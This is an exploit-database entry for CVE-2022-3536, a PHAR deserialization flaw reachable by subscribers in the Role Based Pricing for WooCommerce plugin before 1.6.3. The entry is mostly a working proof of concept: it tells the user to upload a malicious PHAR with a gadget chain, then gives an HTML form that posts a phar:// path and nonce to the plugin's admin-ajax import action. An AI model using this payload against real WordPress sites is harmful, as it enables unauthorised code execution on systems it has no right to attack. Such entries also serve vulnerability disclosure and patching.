Exploit for Role Based Pricing for WooCommerce < 1.6.3 - Subscriber+ PHAR Deserialization CVE-2022-3536

Name: Exploit for Role Based Pricing for WooCommerce < 1.6.3 - Subscriber+ PHAR Deserialization CVE-2022-3536
Rating: 5 (50 reviews)

2022-10-17 | CVSS 0.5

## https://sploitus.com/exploit?id=WPEX-ID:6AF63AAB-B7A6-4EF6-8604-4B4B99467A34
As a subscriber, upload a malicious file being a PHAR with a gadget chain, open the HTML code below while being logged in as a subscriber and submit it

<form action="https://example.com/wp-admin/admin-ajax.php?action=import_pricing_rules" method="POST" enctype="multipart/form-data">
    <input type="text" name="file_path" value="phar://path-to-malicious-phar">
    <input type="text" name="afcsp_nonce" value="xxxxx"><!-- since 1.6.2 -->
    <input type="submit" name="submit" value="submit">
</form>